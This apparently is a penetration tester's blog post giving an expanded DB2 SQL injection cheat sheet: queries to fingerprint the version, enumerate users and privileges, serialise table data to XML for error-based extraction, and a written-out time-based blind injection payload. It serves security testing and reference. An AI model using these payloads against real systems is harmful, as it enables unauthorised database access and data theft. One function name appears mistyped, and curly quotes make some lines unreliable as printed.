DB2 SQL injection cheat sheet

I’m sure we all (pentesters) make extensive use of pentestmonkey’s SQL injection cheat sheets. They are touchstones when it comes down to SQL injection, and most of the time they save the day. However, DB2 cheat sheet is one of the less complete in pentestmonkey’s website. It might be because it’s not a very common database engine and a fairly complex one. I’ve had the luck? of coming across lot’s of DB2 systems in my last and also in my current job. Hence the missing information was extremely annoying.

Following this lines there is a table with an updated DB2 SQL injection cheat sheet, using pentestmonkey’s as starting point. The updated/modified or new fields are marked with an asterisk (*). All of these queries have been tested on a Win32+DB2 v10.1.0, although I’ve also had the chance to test some on Z/OS+DB2 v9.x and v8.x and most of them work fine. Please note that I’m not a DB2 expert, so If you find errors or inaccurate information, or you know other exciting tricks, please feel free to contact me. Finally, I’ve uploaded some DB2 dumps of default privileges, tables with PUBLIC access, and other interesting stuff.

Version*

select service_level from table(sysproc.env_get_inst_info()) as instanceinfo

select getvariable(‘sysibm.version’) from sysibm.sysdummy1 — (v8+)

select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo

select service_level,bld_level from sysibmadm.env_inst_info

Comments

select blah from foo — comment like this (double dash)

Current User

select user from sysibm.sysdummy1

select session_user from sysibm.sysdummy1

select system_user from sysibm.sysdummy1

List Users*

DB2 uses OS accounts. Those with DB2 access can be retrieved with:

select distinct(authid) from sysibmadm.privileges — priv required

select grantee from syscat.dbauth — incomplete results

select distinct(definer) from syscat.schemata — more accurate

select distinct(grantee) from sysibm.systabauth — same as previous

List Password Hashes

N/A (OS User Accounts)

List Privileges

select * from syscat.tabauth — shows priv on tables

select * from syscat.tabauth where grantee = current user — shows privs for current user

‘ and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 — If user starts with ascii 68 (‘D’), the heavy query will be executed, delaying the response. However, if user doesn’t start with ascii 68, the heavy query won’t execute and thus the response will be faster.

Serialize to XML (for error based)*

select xmlagg(xmlrow(table_schema)) from sysibm.tables — returns all in one xml-formatted string

select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) — Same but without repeated elements

select xml2clob(xmelement(name t, table_schema)) from sysibm.tables — returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.

select dbpartitionnum, name, value from sysibmadm.dbcfg where name like ‘auto_%’ — Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.